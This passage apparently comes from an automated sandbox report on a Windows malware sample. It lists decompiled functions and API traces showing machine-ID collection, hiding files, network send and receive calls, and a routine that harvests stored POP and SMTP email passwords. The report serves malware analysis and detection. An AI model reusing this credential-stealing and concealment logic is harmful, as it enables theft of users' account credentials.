                          • API ID: AddressProc
                          • String ID: s1@
                          • API String ID: 190572456-427247929
                          • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                          • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                          • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E00404A52(void* _a4, char* _a8, char* _a12) {
                          				void* _v8;
                          				int _v12;
                          				void* __ebx;
                          				char* _t10;
                          				long _t13;
                          				char* _t27;
                          
                          				_push(_t21);
                          				_t27 = E00402B7C(0x208);
                          				if(_t27 == 0) {
                          					L4:
                          					_t10 = 0;
                          				} else {
                          					E00402B4E(_t27, 0, 0x208);
                          					_v12 = 0x208;
                          					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                          					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                          					if(_t13 != 0) {
                          						E00402BAB(_t27);
                          						goto L4;
                          					} else {
                          						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                          						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                          						E00404A39(_v8); // executed
                          						_t10 = _t27;
                          					}
                          				}
                          				return _t10;
                          			}

                           Instruction addresses: 0x00404a56 0x00404a65 0x00404a6a 0x00404ad1 0x00404ad1 0x00404a6c 0x00404a71 0x00404a79 0x00404a85 0x00404a9a 0x00404a9e 0x00404acb 0x00000000 0x00404aa0 0x00404aac 0x00404abc 0x00404ac1 0x00404ac6 0x00404ac6 0x00404a9e 0x00404ad9

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                          • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateOpenProcessQueryValue
                          • String ID:
                          • API String ID: 1425999871-0
                          • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                          • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E004060BD(void* __eflags) {
                          				signed int _v8;
                          				char _v12;
                          				short _v16;
                          				char _v20;
                          				void* __ebx;
                          				intOrPtr* _t12;
                          				signed int _t13;
                          				intOrPtr* _t14;
                          				signed int _t15;
                          				void* _t24;
                          
                          				_v16 = 0x500;
                          				_v20 = 0;
                          				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                          				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                          				_v8 = _t13;
                          				if(_t13 != 0) {
                          					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                          					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                          					asm("sbb eax, eax");
                          					_v8 = _v8 &  ~_t15;
                          					E0040604F(_v12);
                          					return _v8;
                          				}
                          				return _t13;
                          			}

                           Instruction addresses: 0x004060c6 0x004060d5 0x004060d8 0x004060f4 0x004060f6 0x004060fb 0x0040610a 0x00406115 0x0040611c 0x0040611e 0x00406121 0x00000000 0x0040612a 0x0040612f

                          APIs
                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: CheckMembershipToken
                          • String ID:
                          • API String ID: 1351025785-0
                          • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                          • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                          • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                          				void* _t3;
                          				int _t5;
                          
                          				_t3 = E00403D4D(__eflags, _a4); // executed
                          				if(_t3 == 0) {
                          					__eflags = 0;
                          					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                          					_t5 = CreateDirectoryW(_a4, 0); // executed
                          					return _t5;
                          				} else {
                          					return 1;
                          				}
                          			}

                           Instruction addresses: 0x00403c68 0x00403c70 0x00403c78 0x00403c82 0x00403c8b 0x00403c8f 0x00403c72 0x00403c76 0x00403c76

                          APIs
                          • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: CreateDirectory
                          • String ID:
                          • API String ID: 4241100979-0
                          • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                          • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                          • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E0040642C(void* __eflags) {
                          				short _v40;
                          				intOrPtr* _t6;
                          				void* _t10;
                          
                          				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                          				 *_t6( &_v40); // executed
                          				return 0 | _v40 == 0x00000009;
                          			}

                           Instruction addresses: 0x0040643c 0x00406445 0x00406454

                          APIs
                          • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: InfoNativeSystem
                          • String ID:
                          • API String ID: 1721193555-0
                          • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                          • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                          • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				intOrPtr _t5;
                          
                          				_t5 = _a12;
                          				if(_t5 == 0) {
                          					_t5 = E00405D0B(_a8) + 1;
                          				}
                          				__imp__#19(_a4, _a8, _t5, 0); // executed
                          				return _t5;
                          			}

                           Instruction addresses: 0x00404eed 0x00404ef2 0x00404efd 0x00404efd 0x00404f07 0x00404f0e

                          APIs
                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                          • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                          • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                          • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                          				int _t6;
                          				void* _t7;
                          
                          				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                          				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                          				return _t6;
                          			}

                           Instruction addresses: 0x00403bdd 0x00403beb 0x00403bee

                          APIs
                          • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: FileMove
                          • String ID:
                          • API String ID: 3562171763-0
                          • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                          • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                          • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                           • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0

                          C-Code - Quality: 100%
                          			E0040427D(WCHAR* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                          				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                          				return _t4;
                          			}

                          APIs
                          • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0

                          C-Code - Quality: 100%
                          			E00404A19(void* _a4, short* _a8, void** _a12) {
                          				long _t5;
                          				void* _t6;
                          
                          				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                          				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                          				return _t5;
                          			}

                          APIs
                          • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0

                          C-Code - Quality: 100%
                          			E00403C40(void* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                          				_t4 = FindCloseChangeNotification(_a4); // executed
                          				return _t4;
                          			}

                          APIs
                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                          Similarity
                          • API ID: ChangeCloseFindNotification
                          • String ID:
                          • API String ID: 2591292051-0

                          C-Code - Quality: 100%
                          			E00403C08(WCHAR* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                          				_t4 = DeleteFileW(_a4); // executed
                          				return _t4;
                          			}

                          APIs
                          • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                          Similarity
                          • API ID: DeleteFile
                          • String ID:
                          • API String ID: 4033686569-0

                          C-Code - Quality: 100%
                          			E00402C1F(WCHAR* _a4) {
                          				struct HINSTANCE__* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                          				_t4 = LoadLibraryW(_a4); // executed
                          				return _t4;
                          			}

                          APIs
                          • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0

                          C-Code - Quality: 100%
                          			E00403BEF(void* _a4) {
                          				int _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                          				_t4 = FindClose(_a4); // executed
                          				return _t4;
                          			}

                          APIs
                          • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0

                          C-Code - Quality: 100%
                          			E00403BB7(WCHAR* _a4) {
                          				long _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                          				_t4 = GetFileAttributesW(_a4); // executed
                          				return _t4;
                          			}

                          APIs
                          • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0

                          C-Code - Quality: 100%
                          			E004049FF(void* _a4) {
                          				long _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                          				_t3 = RegCloseKey(_a4); // executed
                          				return _t3;
                          			}

                          APIs
                          • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0

                          C-Code - Quality: 100%
                          			E00403B64(WCHAR* _a4) {
                          				int _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                          				_t3 = PathFileExistsW(_a4); // executed
                          				return _t3;
                          			}

                          APIs
                          • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                          Similarity
                          • API ID: ExistsFilePath
                          • String ID:
                          • API String ID: 1174141254-0

                          APIs
                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                          Similarity
                          • API ID: recv
                          • String ID:
                          • API String ID: 1507349165-0

                          APIs
                          • closesocket.WS2_32(00404EB0), ref: 00404DEB
                          Similarity
                          • API ID: closesocket
                          • String ID:
                          • API String ID: 2781271927-0

                          C-Code - Quality: 100%
                          			E00403F9E(void* _a4) {
                          				int _t3;
                          				void* _t4;
                          
                          				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                          				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                          				return _t3;
                          			}

                          APIs
                          • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                          Similarity
                          • API ID: FreeVirtual
                          • String ID:
                          • API String ID: 1263568516-0

                          C-Code - Quality: 100%
                          			E00406472(long _a4) {
                          				void* _t3;
                          				void* _t4;
                          
                          				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                          				Sleep(_a4); // executed
                          				return _t3;
                          			}

                          APIs
                          • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0

                          C-Code - Quality: 100%
                          			E004058EA(char* _a4, char* _a8) {
                          				char* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                          				_t4 = StrStrA(_a4, _a8); // executed
                          				return _t4;
                          			}

                          APIs
                          • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

                          C-Code - Quality: 100%
                          			E00405924(WCHAR* _a4, WCHAR* _a8) {
                          				WCHAR* _t4;
                          				void* _t5;
                          
                          				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                          				_t4 = StrStrW(_a4, _a8); // executed
                          				return _t4;
                          			}

                          APIs
                          • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

                          Non-executed Functions

                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040438F
                          • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                          • VariantInit.OLEAUT32(?), ref: 004043C4
                          • SysAllocString.OLEAUT32(?), ref: 004043CD
                          • VariantInit.OLEAUT32(?), ref: 00404414
                          • SysAllocString.OLEAUT32(?), ref: 00404419
                          • VariantInit.OLEAUT32(?), ref: 00404431
                          Similarity
                          • API ID: InitVariant$AllocString$CreateInitializeInstance
                          • String ID:
                          • API String ID: 1312198159-0

                          C-Code - Quality: 88%
                          			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t40;
                          				intOrPtr _t45;
                          				intOrPtr _t47;
                          				void* _t71;
                          				void* _t75;
                          				void* _t77;
                          
                          				_t72 = _a4;
                          				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                          				_t81 = _t71;
                          				if(_t71 != 0) {
                          					_push(__ebx);
                          					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                          					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                          					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                          					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                          					_v8 = _v8 & 0x00000000;
                          					_v20 = _t40;
                          					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                          					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                          					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                          					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                          					_v12 = _v12 & 0x00000000;
                          					_v32 = _t45;
                          					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                          					_t77 = _t75 + 0x50;
                          					_v36 = _t47;
                          					if(_v8 != 0 || _v12 != 0) {
                          						E00405872( *0x49f934, _t71, 1, 0);
                          						E00405872( *0x49f934, _t67, 1, 0);
                          						_t74 = _v16;
                          						E00405872( *0x49f934, _v16, 1, 0);
                          						E00405781( *0x49f934, _v40);
                          						E00405872( *0x49f934, _v20, 1, 0);
                          						_push(_v8);
                          						E00405762(_v16,  *0x49f934, _v24);
                          						E00405872( *0x49f934, _v28, 1, 0);
                          						E00405781( *0x49f934, _v44);
                          						E00405872( *0x49f934, _v32, 1, 0);
                          						_push(_v12);
                          						E00405762(_t74,  *0x49f934, _v36);
                          						_t77 = _t77 + 0x88;
                          					} else {
                          						_t74 = _v16;
                          					}
                          					E0040471C(_t71);
                          					E0040471C(_t67);
                          					E0040471C(_t74);
                          					E0040471C(_v20);
                          					E0040471C(_v24);
                          					E0040471C(_v28);
                          					E0040471C(_v32);
                          					E0040471C(_v36);
                          				}
                          				return 1;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                          • API String ID: 0-2111798378
                          • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                          • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                          • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040549C(signed int _a4, signed int* _a8) {
                          				signed int* _t46;
                          				void* _t47;
                          				signed int* _t48;
                          				signed int* _t49;
                          				signed int* _t50;
                          				signed int* _t51;
                          				signed int* _t52;
                          				signed int* _t53;
                          				signed int* _t55;
                          				signed int* _t57;
                          				signed int _t59;
                          				signed int _t61;
                          				signed int _t62;
                          				unsigned int _t64;
                          				signed int _t77;
                          				signed int _t79;
                          				signed int _t81;
                          				signed int _t95;
                          				signed int _t97;
                          				signed int _t98;
                          				signed int _t100;
                          				signed int _t102;
                          				signed char* _t124;
                          
                          				_t124 = _a4;
                          				_t59 =  *_t124 & 0x000000ff;
                          				if(_t59 >= 0) {
                          					_t57 = _a8;
                          					_t57[1] = _t57[1] & 0x00000000;
                          					 *_t57 = _t59;
                          					return 1;
                          				}
                          				_t95 = _t124[1] & 0x000000ff;
                          				if(_t95 >= 0) {
                          					_t55 = _a8;
                          					_t55[1] = _t55[1] & 0x00000000;
                          					 *_t55 = (_t59 & 0x0000007f) << 0x00000007 | _t95;
                          					return 2;
                          				}
                          				_t61 = _t59 << 0x0000000e | _t124[2] & 0x000000ff;
                          				if(_t61 < 0) {
                          					_t97 = _t95 << 0x0000000e | _t124[3] & 0x000000ff;
                          					_t62 = _t61 & 0x001fc07f;
                          					if(_t97 < 0) {
                          						_t98 = _t97 & 0x001fc07f;
                          						_t77 = _t62 << 0x0000000e | _t124[4] & 0x000000ff;
                          						if(_t77 < 0) {
                          							_t64 = _t62 << 0x00000007 | _t98;
                          							_t100 = _t98 << 0x0000000e | _t124[5] & 0x000000ff;
                          							if(_t100 < 0) {
                          								_t79 = _t77 << 0x0000000e | _t124[6] & 0x000000ff;
                          								if(_t79 < 0) {
                          									_t102 = _t100 << 0x0000000e | _t124[7] & 0x000000ff;
                          									_t81 = (_t79 & 0x001fc07f) << 7;
                          									if(_t102 < 0) {
                          										_t46 = _a8;
                          										 *_t46 = (_t102 & 0x001fc07f | _t81) << 0x00000008 | _t124[8] & 0x000000ff;
                          										_t46[1] = (_t124[4] & 0x000000ff) >> 0x00000003 & 0x0000000f | _t64 << 0x00000004;
                          										_t47 = 9;
                          									} else {
                          										_t48 = _a8;
                          										 *_t48 = _t102 & 0xf01fc07f | _t81;
                          										_t48[1] = _t64 >> 4;
                          										_t47 = 8;
                          									}
                          								} else {
                          									_t49 = _a8;
                          									 *_t49 = (_t100 << 0x00000007 ^ _t79) & 0x0fe03f80 ^ _t79;
                          									_t49[1] = _t64 >> 0xb;
                          									_t47 = 7;
                          								}
                          							} else {
                          								_t50 = _a8;
                          								_a4 = (_t77 & 0x001fc07f) << 0x00000007 | _t100;
                          								 *_t50 = _a4;
                          								_t50[1] = _t64 >> 0x12;
                          								_t47 = 6;
                          							}
                          						} else {
                          							_t51 = _a8;
                          							 *_t51 = _t98 << 0x00000007 | _t77;
                          							_t51[1] = _t62 >> 0x12;
                          							_t47 = 5;
                          						}
                          					} else {
                          						_t52 = _a8;
                          						_t52[1] = _t52[1] & 0x00000000;
                          						 *_t52 = _t97 & 0x001fc07f | _t62 << 0x00000007;
                          						_t47 = 4;
                          					}
                          					return _t47;
                          				} else {
                          					_t53 = _a8;
                          					_t53[1] = _t53[1] & 0x00000000;
                          					 *_t53 = (_t95 & 0x0000007f) << 0x00000007 | _t61 & 0x001fc07f;
                          					return 3;
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                          • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                          • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                          • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E004029D4(signed int _a28, signed int _a36, unsigned int _a40) {
                          				signed int _t26;
                          				signed int _t27;
                          				signed int _t28;
                          				signed int _t39;
                          				signed int _t47;
                          				unsigned int _t69;
                          				unsigned int _t70;
                          				signed int _t71;
                          				signed int _t73;
                          				signed int _t75;
                          				signed int* _t76;
                          
                          				asm("pushad");
                          				_t75 = _a36;
                          				_t69 = _a40;
                          				_t26 = 0;
                          				if(_t75 != 0) {
                          					_t27 = 0xffffffffffffffff;
                          					if(_t69 != 0) {
                          						while((_t75 & 0x00000003) != 0) {
                          							_t47 = _t27 ^  *_t75;
                          							_t75 = _t75 + 1;
                          							_t27 = _t47 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t47) * 4);
                          							_t69 = _t69 - 1;
                          							if(_t69 != 0) {
                          								continue;
                          							}
                          							break;
                          						}
                          						_t73 = _t69 & 0x00000007;
                          						_t70 = _t69 >> 3;
                          						while(_t70 != 0) {
                          							_t76 = _t75 + 4;
